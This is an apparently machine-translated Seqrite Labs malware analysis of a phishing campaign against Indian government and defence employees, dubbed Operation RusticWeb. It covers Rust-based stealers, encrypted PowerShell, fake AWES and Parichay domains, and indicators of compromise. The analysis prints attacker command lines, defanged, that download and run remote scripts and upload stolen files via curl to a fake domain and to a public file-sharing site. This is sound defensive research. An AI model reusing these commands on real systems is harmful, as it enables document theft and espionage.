• Продукция и Услуги
        • облако

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • На Прем

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Платформа

          • Malware Analysis Platform
        • Малый бизнес

          • SOHO Total Edition
        • Услуги

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Кибербезопасность и Data Privacy Awareness
  • Решения
    • BFSI
    • Образование
    • Правительство
    • Здравоохранение
    • ITeS
    • Производство
  • O компании
    • О нас Seqrite
    • Руководство
    • Награды и сертификаты
    • Новости
  • Партнёры
    • Партнерская программа
    • Найти партнера
    • Стать партнером
  • Поддержка
  • Ресурсы
    • статьи
    • Статьи
    • Даташит
    • Сферы деятельности
    • Отчеты об угрозах
    • Руководства
    • точка зрения
    • Понимание Data Privacy
    • Проверьте свой рейтинг риска
    • Диалоги ДПДП
    • Час конфиденциальности
Seqrite Labs Блог
Связаться с отделом продаж Под обстрелом?
  • Продукция и Услуги
        • облако

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • На Прем

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Платформа

          • Malware Analysis Platform
        • Малый бизнес

          • SOHO Total Edition
        • Услуги

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Кибербезопасность и Data Privacy Awareness
  • Решения
    • BFSI
    • Образование
    • Правительство
    • Здравоохранение
    • ITeS
    • Производство
  • O компании
    • О нас Seqrite
    • Руководство
    • Награды и сертификаты
    • Новости
  • Партнёры
    • Партнерская программа
    • Найти партнера
    • Стать партнером
  • Поддержка
  • Ресурсы
    • статьи
    • Статьи
    • Даташит
    • Сферы деятельности
    • Отчеты об угрозах
    • Руководства
    • точка зрения
    • Понимание Data Privacy
    • Проверьте свой рейтинг риска
    • Диалоги ДПДП
    • Час конфиденциальности
Главная  /  Разное  / Операция RusticWeb направлена ​​против правительства Индии: от вредоносного ПО на базе Rust до утечки данных из веб-сервисов
Операция RusticWeb направлена ​​против правительства Индии: от вредоносного ПО на базе Rust до утечки данных из веб-сервисов
21 декабрь 2023

Операция RusticWeb направлена ​​против правительства Индии: от вредоносного ПО на базе Rust до утечки данных из веб-сервисов

Написано Сатвик Рам Пракки
Сатвик Рам Пракки
Разное

SEQRITE Команда APT-лабораторий обнаружила фишинговую кампанию, направленную на различных сотрудников индийского правительства с октября 2023 года. Мы также выявили атаки на государственные и частные организации в оборонном секторе в декабре. Для кражи конфиденциальных документов на веб-сервис, а не на выделенный сервер управления и контроля (C2), использовались новые полезные нагрузки на основе Rust и зашифрованные команды PowerShell. Активно модифицируя свой арсенал, они также использовали поддельные домены для размещения вредоносных полезных нагрузок и файлов-приманок. Ниже приведены несколько названий доменов и примеров приманок, использованных в этой кампании:

  • Форма IPR Департамента кадров и обучения, предназначенная для сотрудников IAS
  • Поддельный домен, имитирующий Army Welfare Education Society (AWES)
  • Статистический отчет CDR Ассама от Детского фонда Кайлаша Сатьяртхи
  • Еще один поддельный домен, имитирующий Parichay, правительственную платформу единого входа
  • Форма заявки на участие в Фонде обеспечения офицеров службы обороны (DSOP)
  • Презентация ежеквартального обзора инициатив Министерства обороны

Эта кампания отслеживается как Операция RusticWeb, где несколько ТТП пересекаются с группами АПТ, связанными с Пакистаном – Прозрачное племя (APT36) и Боковое копирование. Он также имеет сходство с операцией Бронебойщик отчет, опубликованный Cisco в 2021 году, и таргетинг с ESSA стипендиальная форма AWES наблюдался нашей командой еще в том же году.

Злоумышленники начали переходить с известных компилируемых языков на новые, такие как Golang, Rust и Nim. Это обеспечивает кросс-совместимость, но одновременно затрудняет обнаружение. Среди недавних примеров вредоносного ПО на Golang, проанализированных нашей командой, — Деформироваться вредоносных программ экосистема который использует бот Telegram в качестве C2 и полезную нагрузку на базе Linux Арес КРЫСВ то же время операторы различных программ-вымогателей (RaaS) перешли с Golang на Rust, поскольку он обеспечивает высокопроизводительное шифрование и скорость обхода блокировок, а также гарантирует безопасность памяти.

Цепочка заражения 1

Первая обнаруженная инфекция активно использует полезные нагрузки на основе Rust, используемые для сбора данных о файловой системе. Вредоносный файл-ярлык запускает заражение, в котором поддельный домен AWES используется для размещения этих полезных нагрузок и передачи данных на веб-сервис обмена файлами.

Рис. 1 – Цепочка заражения (1)

Злоумышленник атакует жертву с помощью фишинга, приводящего к архивному файлу с именем «ИПР_2023-24». Здесь содержится файл ярлыка Windows, маскирующийся под PDF-файл с двойным расширением. Название комментария предполагает, что приманкой является форма, связанная с правами интеллектуальной собственности.

Рис. 2 – Вредоносный файл-ярлык

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -nop -c «iwr 'hxxps://rb[.]gy/gbfsi' -OutFile $env:USERPROFILE\Documents\file.ps1; & $env:USERPROFILE\Documents\file.ps1»

Открытие этого файла запускает PowerShell для загрузки и выполнения скрипта из rb[.]gy domain, бесплатный сокращатель URL. Параметры командной строки для обхода политики выполнения без профиля используются для загрузки скрипта PS1 с помощью Invoke-WebRequest.

виктимология

Используя сокращённый URL-адрес, мы можем проверить статистику по количеству кликов и стране, откуда они были сделаны, используя их трекер. Кампания стартовала в конце сентября, и в октябре наблюдалась высокая активность, причём 26.53% из них приходилось только на Индию. Это не учитывает подтверждённую виктимологию, но даёт общее представление о целевой аудитории.

Рис. 3 – Виктимология

Стадия PowerShell

Расширенный URL-адрес указывает на домен с именем awesscholarship[.]в для извлечения и сохранения скрипта PowerShell (файл.ps1) в Документы Папка. До проверки этого скрипта доменное имя выглядит как стипендия для «Общества армейского благосостояния и образования». Законный домен этой организации — стипендия[.]awesindia[.]com, где ранее уже наблюдались подобные фишинговые кампании. При открытии этой поддельной страницы домена происходит перенаправление на официальную страницу AWES с официальным предупреждением, как показано ниже.

Рис. 4 – Официальное уведомление о поддельном сайте

Скрипт PowerShell начинается с настройки URL-путей для загрузки полезных данных следующего этапа вместе с документом-приманкой. Настраиваются целевые пути для загрузки и выгрузки файлов, где определены три функции, предназначенные в первую очередь для этих функций.

Рис. 5 – Скрипт PowerShell

Функции X и Y используются для записи сообщений в файл и загрузки файла с указанного URL-адреса в целевой каталог и его записи в журнал. Целевое местоположение — это местоположение по умолчанию. Документы каталог, в котором новая папка с именем Скачать создается для размещения поддельного PDF-файла и архива рядом с папкой.

Рис. 6 – Скрипт PowerShell (продолжение)

После открытия приманки извлекается архивный файл, содержащий один файл без расширения. Он переименовывается, добавляя расширение EXE, и запускается. Затем функция Z используется для загрузки файла журнала на сервер. виться команду, а затем удалите записанные журналы.

Рис. 7 – Загруженный файл журнала

Между тем, открытый файл-обманка представляет собой форму заявления о возврате недвижимого имущества, где услуга упоминается как «Индийская административная служба'. Множество подобных форм на различных порталах индийского правительства доступны в открытом доступе. Однако эта пустая форма IPR доступна на сайте Департамента кадров и профессиональной подготовки (DoPT). . Это относится к Министерству по делам кадров, жалобам населения и пенсиям Индии. Обратите внимание, что это никак не связано с программой стипендий ESSA (Education scholarship program), предусмотренной в форме заявления на получение профессиональной военной стипендии.

Рис. 8 – Приманка: форма IPR для сотрудников IAS (октябрь 23 г.)

Загрузчик: этап проверки системы

Полезная нагрузка EXE оказывается скомпилированным двоичным файлом Rust, который проверяет основную системную информацию, найденную в пути PDB – 'syscheck.pdbПосле разбора имён функций Rust с помощью плагина IDA Pro мы видим множество вызовов функций записи и выполнения команд. Он извлекает информацию с помощью:

  • Домен ifconfig[.]me для получения IP-адреса
  • Команда WMIC для извлечения активных дисков, присутствующих в системе-жертве – «wmic logicaldisk получить заголовок».

Рис. 9 – Журналы проверки системы

Эти журналы записываются в файл с именем «МояСистема.txt' в ProgramData\syscheck каталог и загружен в тот же домен, что и:

«curl -F TT=@C:\ProgramData\syscheck\MySystem.txt hxxps://awesscholarship[.in/upload/upload.php» 

Рис. 10 – URL для загрузки следующего этапа

Затем еще один архив под названием файл1.zip скачивается с того же поддельного домена и извлекается. Он переименовывается в «MySystem.exe' и казнён. Наконец, настойчивость для этого окончательная полезная нагрузка создается через каталог Startup.

Рис. 11 – Сохранение через запуск

Stealer: Финальная стадия

Последняя полезная нагрузка — это ещё одна вредоносная программа на основе Rust, которая крадет файлы, собирает имя и IP-адрес системы и загружает отдельные файлы вместе с журналами. В ней нет встроенных функций сложных программ для кражи информации, таких как кража данных из веб-браузеров, Discord/Steam или криптовалютных кошельков. В ходе этой кампании было обнаружено несколько версий этой программы с временными метками компиляции с сентября по настоящее время (декабрь), и их уровень обнаружения на Virus Total значительно ниже.

MD5 Временная метка компиляции PDB
da745b60b5ef5b4881c6bc4b7a48d784 2023-09-26 syscheck.pdb
f68b17f1261aaa4460d759d95124fbd4 2023-09-26 алам.pdb
237961bbba6d4aa2e0fae720d4ece439 2023-10-26 алам.pdb
d2949a3c4496cb2b4d204b75e24390d9 2023-12-08 Zew.pdb
fc61b985d8c590860f397d943131bfb5 2023-12-11 Zew.pdb

Изменения в имени пути PDB можно увидеть в образцах за октябрь и декабрь, но при сравнении с помощью BinDiff сходство практически идентично и составляет 91%, за исключением нескольких незначительных изменений.

Рис. 12 – Сходство в образцах

Он перечисляет все файлы документов и архивов на всех дисках, которые были загружены ранее на этапе загрузки. В новой папке создаются два файла журнала с разными именами (Микро, Файл) для каждого образца под ProgramData Каталог. Они используются для хранения записей загруженных файлов и журналов перечисленных файлов. После сохранения перечисленных файлов в каталогLogs.txt,' каждый файл загружается через виться Метод PUT для оши[.]ат домен, анонимный публичный файлообменник, называемый OshiUpload.

«curl -TC:\Users\test\Downloads\ .zip hxxps://oshi[.]at” 

Вместе с именем рабочего стола ссылки на загрузку этих файлов сохраняются в «Записи.txt,', который содержит три URL-адреса для каждого файла. Две из них — ссылки Clearnet: одна для управления, другая для загрузки. Третья — домен Tor Oshi для загрузки через скрытый сервис.

Рис. 13 – Ссылки на скачивание загруженных файлов

На странице управления отображаются атрибуты загруженного файла: ссылки для скачивания, размер, тип, хеш и временная метка. Доступны опции уничтожения файла и таймер истечения срока действия.

Рис. 14 – Страница управления загруженными файлами

Файлы журнала с временными метками в имени загружаются на поддельный домен AWES. Ответ сервера проверяется на успешность загрузки, после чего сервер переходит в режим бесконечного сна до тех пор, пока не будет прерван.

Рис. 15 – Ответ сервера после загрузки логов

В новых вредоносных программах, которые мы наблюдали в декабре, злоумышленник использует новый документ-приманку, принадлежащий Детскому фонду Кайлаша Сатьяртхи. Документ доступен на их сайте. ., что связано с их статистическим отчетом «Детские браки и другие преступления против детей в Ассаме».

Рис. 16 – Приманка: Assam CDR (декабрь 23 г.)

Использование в фишинговой кампании приманок под названием детские фонды или общества для детей военнослужащих и сотрудников IAS свидетельствует о целенаправленных усилиях, направленных против должностных лиц правительства Индии, особенно тех, кто связан с детскими фондами или обществами.

Цепочка заражения 2

Другая похожая цепочка заражения была обнаружена в декабре с использованием maldocs, где перечисление и эксфильтрация выполнялись с помощью скрипта PowerShell вместо полезных нагрузок на основе Rust. Наряду с двумя поддельными доменами здесь использовались зашифрованные скрипты PowerShell.

Рис. 17 – Цепочка заражения (2)

Заражение начинается с фишингового вредоносного документа, содержащего вредоносный макрос VBA. С помощью простой обфускации VBA он содержит зашифрованные команды PowerShell. Были обнаружены аналогичные вредоносные документы, использующие слегка изменённые команды PS.

  1. Dsop_Nom.ppam
  2. DSOP-NOM.ppam
  3. PM_INDIG_INITIATIVE_BRIEF.ppam

Рис. 18 – Вредоносный макрос VBA

Зашифрованный PowerShell

После открытия документа цифры преобразуются в символы, образующие «Powershell'. Команда PowerShell содержит зашифрованные данные, которые преобразуются в SecureString с помощью 'ConvertTo-SecureString' с ключом. Это похоже на расшифровку PowerShell, показанную в Emotet но с небольшим дополнительным запутыванием.

Рис. 19 – Зашифрованные и замаскированные команды PowerShell

В первом maldoc преобразованная строка использует Судебный исполнитель объект для памяти, управляющий расшифровкой через встроенный DPAPI для вызова команд с помощью SecureStringToGlobalAllocUnicode Второй метод использует PSCertificateData Объект, чтобы получить строку с обычным текстом. В последнем случае PtrToStringBSTR  и  SecureStringToBSTR используются с Судебный исполнитель Объект. Для обфускации команды используют приемы из Вызов-обфускация для маскировки запуска команды IEX с использованием переменных окружения:

Рис. 20 – Запутанная команда IEX

Просматривая полностью расшифрованные команды PowerShell, он загружает файл-обманку и скрипт PowerShell следующего этапа. Они загружаются с доменов в Скачать и Документы каталоги и выполнены.

Рис. 21 – Расшифрованные команды (1)

 

Рис. 22 – Расшифрованные команды (2)

Домены и приманки

Первый сценарий загрузки с домена 'parichay.epar[.]in,«В то время как второй использует тот же поддельный домен AWES, что и в первой цепочке заражения. Это ещё один поддельный домен, используемый для размещения вредоносных программ, имитирующий официальный правительственный сайт».parichay.nic[.]inЭто правительственная платформа единого входа (SSO), разработанная для подключения пользователей к единой системе аутентификации. В то время как Паричай предоставляет государственным служащим доступ к различным услугам сетевых карт (NIC) на основе «отдела пользователя» и адреса электронной почты правительства (@nic.in/@gov.in), Ян Паричай предоставляет гражданам доступ к услугам, ориентированным на граждан.

Рис. 23 – Законные и поддельные домены Паричай

Первая ложная информация касается формы заявки на финансирование Фонда DSOP (Defence Services Officers Provident), который касается Министерства обороны. Вторая ложная информация связана с презентацией ежеквартального отчёта для Министерства обороны.

Рис. 24 – Приманка: Фонд обеспечения офицеров службы обороны (DSOP)

Рис. 25 – Приманка: Министерство обороны

Скрипт PowerShell следующего этапаMail_check.ps1' dropped шифруется и обфусцируется аналогичным образом. Расшифровав скрипт, можно увидеть, что он начинается со загрузки и извлечения архивного файла, содержащего полезную нагрузку под названием 'syscheck.exe.' Он извлекается непосредственно в папку «Автозагрузка» для обеспечения персистентности этой полезной нагрузки.

Рис. 26 – Скрипт PowerShell, удаленный после расшифровки

Перечислить и отфильтровать

Двоичный файл — это еще одна полезная нагрузка на основе Rust с другим именем PDB, «Аплет.pdb». Он имеет временную метку компилятора 14 декабря и название Cisco AnyConnect Web Helper с подписанным сертификатом.

Рис. 27 – Двоичный файл с сертификатом WebHelper

Вместо того, чтобы выполнять перечисление и эксфильтрацию напрямую, это приводит к запуску скрипта PowerShell 'sys.ps1' в Картинки Для этой цели после получения имени пользователя используется каталог. Выполняется команда:

«powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\test\Pictures\sys.ps1»

При перечислении исключает 3 папки: Windows и оба 'Program Files' каталогов. В шорт-лист включены только 13 типов файлов: ('.ppt', '.pptx', '.pdf', '.xlsx', '.xlsm', '.xls', '.xlam', '.doc', '.docx', '.docm', '.txt', '.dot', '.ppam'), и каждый файл регистрируется в 'paths.txt' в Документы папку.

Рис. 28 – Подсчет и эксфильтрация

После того, как он будет загружен в оши[.]ат, URL-адреса для загрузки сохраняются в 'suc_logs.txtАналогично кампании 1. Этот скрипт работает в бесконечном цикле, проверяя наличие новых файлов. Журналы URL-адресов периодически загружаются по истечении определённого времени.

 Рис. 29 – Загрузка журналов

Между тем, родительский двоичный файл (системная проверка) переходит в режим бесконечного сна, если его не прерывать. В этом случае вместо выхода он снова загружает логи URL в Oshi. Кроме того, на этот раз он также загружает их на поддомен FireBaseio в качестве резервной меры.

Рис. 30 – Загрузка в Firebaseio с аутентификацией

Firebase Realtime Database — это облачная база данных NoSQL, которая может хранить и синхронизировать данные в режиме реального времени. Это открытая платформа Google, которая широко используется разработчиками для облачных приложений и привлекает злоумышленников для развертывания вредоносного ПО, такого как Невезучий Камран для извлечения данных. Сервис предоставляет ряд функций, таких как облачное хранилище, хостинг, база данных в режиме реального времени и многое другое.

Заключение

Новая фишинговая кампания направлена ​​на различных сотрудников индийского правительства с целью кражи конфиденциальных документов. Полезные данные на основе Rust и зашифрованные скрипты PowerShell были развернуты для сбора и передачи документов в анонимный публичный файлообменник под названием OshiUpload вместо выделенного сервера управления и контроля (C2). Оба поддельных домена, имитирующих государственные организации, использовались для размещения вредоносных данных в этой кибершпионской атаке. Операция RusticWeb может быть связана с угрозой APT, поскольку имеет сходство с различными группами, связанными с Пакистаном. Поскольку злоумышленники переходят на вредоносное ПО, разработанное с использованием новых языков программирования, таких как Golang, Rust и Nim, мы рекомендуем проявлять осторожность и принимать необходимые меры предосторожности для обеспечения безопасности.

SEQRITE Protection

  • Lnk.Stealer.48397
  • PS.Stealer.48398
  • RustStealer.48408.GC
  • Script.RustStealer.48409
  • Trojan.Ruststealer

MITRE ATT & CK

тактика Идентификатор техники Имя
Развитие ресурсов T1583.001

T1587.001

T1588.002

T1608.001

T1608.005

Приобретение инфраструктуры: домены

Возможности развития: вредоносное ПО

Получить возможности: инструмент

Возможности этапа: загрузка вредоносного ПО

Возможности этапа: Ссылка на цель

Первоначальный доступ T1566.002 Фишинг: Ссылка на фишинг
Типы T1106

T1129

T1059

T1047

T1204.002

Родной API

Общие модули

Интерпретатор команд и сценариев

Инструментарий управления Windows

Пользовательское выполнение: вредоносный файл

Настойчивость T1547.001 Ключи запуска реестра / Папка автозагрузки
Уклонение от защиты T1027.010

T1036.007

T1140

Запутывание команд

Маскарад: двойное расширение файла

Деобфускация/декодирование файлов или информации

Дискавери T1016

T1033

T1083

Обнаружение конфигурации сети системы

Обнаружение владельца системы/пользователя

Обнаружение файлов и каталогов

‎ T1005

T1119

Данные из локальной системы

Автоматизированный сбор

Управление и контроль T1105 Входной инструмент передачи
эксфильтрации T1020

T1567

Автоматическая эксфильтрация

Эксфильтрация через веб-сервис

МНК

MD5 Имя файла
56cb95b63162d0dfceb30100ded1131a IPR_2023-24.pdf.zip
13ee4bd10f05ee0499e18de68b3ea4d5 IPR_2023-24.pdf.lnk
de30abf093bd4dfe6b660079751951c6 DSOP-NOM.ppam
PowerShell
c9969ece7bb47efac4b3b04cdc1538e5 в.пс1
f14e778f4d22df275c817ac3014873dc В.пс1
501a6d48fd8f80a134cf71db3804cf95 Mail_check.ps1
6d29fc0a73096433ff9449c4bbc4cccc sys.ps1
Приманки
a9182c812c7f7d3e505677a57c8a353b Ipr.pdf
f5d8664cbf4a9e154d4a888e4384cb1d abc009.pdf
3ce8dfb3f1bff805cb6b85a9e950b3a2 1.pdf
a696c50dd5d15ba75c9e7f8d3c64997c 1.pdf
архив
e0102071722a87f119b12434ae651b48
ee8d767069faf558886f1163a92e4009
9f3359ae571c247a8be28c0684678304
b0b6629d35451bcc511c0f2845934c3e
f2501e8b57486c427579eeda20b729fd
20b4eb5787faa00474f7d27c0fea1e4b
635864ff270cf8e366a7747fb5996766
EXE
da745b60b5ef5b4881c6bc4b7a48d784
f68b17f1261aaa4460d759d95124fbd4
237961bbba6d4aa2e0fae720d4ece439
d2949a3c4496cb2b4d204b75e24390d9
fc61b985d8c590860f397d943131bfb5
04557782d7017f18ec059fc96d7f2dc8
Домен/IP
awesscholarship[.]в
89.117.188[.]126 
parichay.epar[.]in
13.232.102[.]189 
оши[.]ат
alfa-aeafa-default-rtdb.firebaseio[.]com
URL-адреса
hxxps://rb[.]gy/gbfsi
hxxps://awesscholarship[.]in/upload/file.zip
hxxps://awesscholarship[.]in/upload/file1.zip
hxxps://awesscholarship[.]in/upload/in.ps1
hxxps://awesscholarship[.]in/upload/upload.php
hxxps://awesscholarship[.]in/upload/Ipr.pdf
hxxps://awesscholarship[.]in/upload/abc009.pdf
hxxps://awesscholarship[.]in/upload/1.pdf
hxxps://awesscholarship[.]in/upload/DSOP-NOM.zip
hxxps://awesscholarship[.]in/ppam/Mail_Check.ps1
hxxps://awesscholarship[.]in/ppam/syscheck.zip
hxxps://parichay.epar[.]in/Win/1.pdf
hxxps://parichay.epar[.]in/Win/Mail_Check.ps1
PDB
C:\Users\123\Desktop\Syscheck\target\release\deps\syscheck.pdb
C:\Users\123\Desktop\Alam\target\release\deps\alam.pdb
C:\Users\123\Desktop\Aplet\target\release\deps\Aplet.pdb
D:\HOME\DESKTOP НОВЫЕ ДАННЫЕ\Zew\target\release\deps\Zew.pdb
Хозяин
C:\ProgramData\syscheck\file.zip
C:\ProgramData\syscheck\MySystem.exe
C:\ProgramData\syscheck\MySystem.txt
C:\ProgramData\Micro\logs.txt
C:\ProgramData\Micro\records.txt
C:\ProgramData\Files\Log.txt
C:\ProgramData\Files\Records.txt
Документы\downloadAndExecuteLog.txt
Документы\файл.ps1
Документы\myfile.zip
Документы\распакованная_папка\файл.exe
Документы\Загрузки\myfile.pdf
Документы\пути.txt
Документы\suc_logs.txt
Документы\Mail_Check.ps1
Документы\syscheck.zip
Загрузки\1.pdf
Картинки\sys.ps1
%appdata%\Microsoft\Windows\Главное меню\Программы\Автозагрузка\MySystem.exe
%appdata%\Microsoft\Windows\Главное меню\Программы\Автозагрузка\syscheck.exe

Автор: Sathwik Ram Prakki

 предыдущий постНастало время обеспечить будущее: примеры использования решения XDR...
Следующий пост  Как предотвратить удалённую атаку программ-вымогателей: простой способ
Сатвик Рам Пракки

О Сатвике Раме Пракки

Сатвик Рам Пракки работает исследователем в области безопасности в лаборатории безопасности компании Quick Heal. Его основные направления деятельности: Threat Intelligence, поиск угроз и написание статей на темы...

Статьи Сатвика Рама Пракки »

Похожие статьи

  • Атаки с использованием омоглифов: как похожие друг на друга символы используются для кибермошенничества

    30 марта 2026
  • Использование легитимных низкоуровневых инструментов в качестве оружия: как программы-вымогатели обходят антивирусную защиту

    27 марта 2026
  • Операция GhostMail: российская APT-группировка использует уязвимость Zimbra Webmail для атаки на государственное агентство Украины.

    17 марта 2026
Избранные авторы
  • Seqrite
    Seqrite

    Seqrite является ведущим поставщиком решений в области корпоративной кибербезопасности. Специализируется на...

    Прочитайте больше статей Seqrite
  • Джоти Карлекар
    Джоти Карлекар

    Я страстный писатель, которому нравится создавать контент о новых технологиях и...

    Прочтите другие статьи Джоти Карлекара
  • Бинеш П.
    Бинеш П.

    Я страстный энтузиаст кибербезопасности и преданный писатель. Обладая талантом...

    Читайте другие статьи Бинеша П.
  • Санджай Каткар
    Санджай Каткар

    Санджай Каткар — соуправляющий директор Quick Heal Technologies...

    Читайте другие статьи Санджая Каткара
Темы
склонный (25) Cyber-атака (36) кибер-атаки (58) кибератаки (16) кибератаки (15) Информационная безопасность (340) информационная безопасность (34) Киберугроза (33) кибер-угрозы (51) Данные нарушения (56) нарушения данных (29) Потеря данных (28) предотвращение потери данных (34) data privacy (16) защита данных (34) безопасность данных (19) DLP (50) ДПДП (14) ДПДПА (17) Шифрование (16) для защиты конечных точек (112) Безопасность предприятия (19) Эксплуатировать (13) GDPR (14) вредоносных программ (76) анализ вредоносных программ (14) вредоносная атака (23) МДМ (27) Microsoft (15) MITRE ATT & CK (13) Сетевая безопасность (26) фишинг (30) Ransomware (69) атака ransomware (31) атаки ransomware (31) защита от копирования (16) Seqrite (41) Seqrite Шифрование (27) Seqrite EPS (33) Seqrite Услуги (16) обнаружение угрозы (13) Threat Intelлигенция (19) UTM (34) Уязвимость (16) нулевое доверие (13)
Seqrite Labs

Ведущий поставщик решений по корпоративной ИТ-безопасности, упрощающий защиту конечных точек, данных и сетей с помощью лучших в своем классе решений по предотвращению, обнаружению и реагированию на угрозы по всему миру.

Подробнее о Seqrite

Наши соцсети:

Подпишитесь на нашу рассылку

Будьте в курсе последних тенденций и новостей в сфере кибербезопасности.

Загрузка
Продукция и Услуги
  • облако
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • На Прем
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Платформа
  • Malware Analysis Platform
  • Микро Бизнес
  • SOHO Total Edition
  • Услуги
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Кибербезопасность и Data Privacy Awareness
Ресурсы
  • статьи
  • Статьи
  • Даташит
  • Отчеты об угрозах
  • Руководства
  • точка зрения
  • Понимание Data Privacy
  • Диалоги ДПДП
  • Политика и соответствие
  • Лицензионное соглашение
  • GoDeep.AI
  • SIA
  • Час конфиденциальности
Свяжитесь с нами
  • Зарегистрированные офисы
  • Давайте поговорим о кибербезопасности
Поддержка
  • Техподдержка
  • Загрузка программного обеспечения
  • Автономное обновление
  • Обновление прошивки
  • Обновления
  • Документация
О Нас
  • О нас Seqrite
  • Руководство
  • Награды и признание
  • Новости
Сотрудничайте
  • Партнерская программа
  • Найти партнера
  • Стать партнером
  • Seqrite Сертификаты

© 2026 Quick Heal Technologies Ltd.

Карта сайта Политика конфиденциальности Юридическая информация Политика использования файлов cookie Условия эксплуатации